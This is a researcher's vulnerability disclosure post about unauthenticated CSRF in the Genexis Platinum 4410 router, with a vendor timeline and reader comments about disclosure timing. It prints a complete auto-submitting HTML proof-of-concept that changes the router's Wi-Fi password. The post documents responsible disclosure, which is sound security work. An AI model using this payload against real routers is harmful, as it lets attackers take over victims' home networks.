While testing the Genexis Platinum 4410 home router version 2.1 (software version P4410-V2-1.28), I was able to find that the router is vulnerable to Broken Access Control and CSRF.
Summary
Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the Wi-Fi access point’s password.
Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.
โโOWASP
For more information on CSRF, please visit this article.
Impact
An attacker can send the victim a link, which if he clicks while he is connected to the Wi-Fi network established from the vulnerable router, the password of the Wi-Fi access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.
Vulnerability
Ideally, this attack would be troublesome because for a CSRF attack to be successful, it requires the victim to be logged in to the application that is under the attack (in this case, the web-based setup page at 192.168.1.1) and most router setup pages ends user sessions automatically. Additionally, it is rarely that customers visit their router’s setup page as well. However, due to the broken access control vulnerability in the latest version of the firmware at the time of reporting, the request to change password could be sent by unauthenticated parties as well.
Thus combining the CSRF and Broken Access Control vulnerabilities on this version of the firmware, an attacker can create an HTML document with the following code and bait the user into submitting it.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N/A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht_bw" value="1" />
<input type="hidden" name="wlgMode" value="b,g,n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID_Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb_enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap-pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save_Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
As long as the victim is connected to the Wi-Fi access point established by the affected router, the password of the access point would get changed as shown in the below video.
Timeline
- Vulnerability reported to the Genexis team โ August 28, 2020
- Team confirmed firmware release containing fix โ September 14, 2020
Recommendation
- As per the Genexis team, customers should contact their ISP in order to get access to the latest firmware.
- Use a more secure router if you are unable to upgrade the firmware.
Hi Jinson, when will you release more information about this exploit?
Hi, more information will be released after October 14th, as users would need time to contact their ISP and get the update.
Understood and thanks. With all due respect I think you may be optimistic if you think that more than 1% of users will notice the CVE and contact their ISP for a firmware upgrade.
Some issues with Genexis routers appeared on Hathway’s network roughly a month ago, perhaps you also noticed this? In this case it would probably be best to talk to ISP directly.
No worries. ๐
Yes, I realize that a large number of Genexis router users would not be aware of such vulnerabilities. Regardless, I am waiting for a month before giving more information about the vulnerability so that anyone who notices this or other publications regarding the same have enough time to talk to their ISPs and get the new firmware update.
From my end, what I have done is disclose the vulnerability and ask Genexis to push an update to ISPs and users notifying them of the security issue and the update fixing it. I have also recently tried contacting my ISP (not Hathway) directly, but I haven’t heard back yet. Will follow up soon.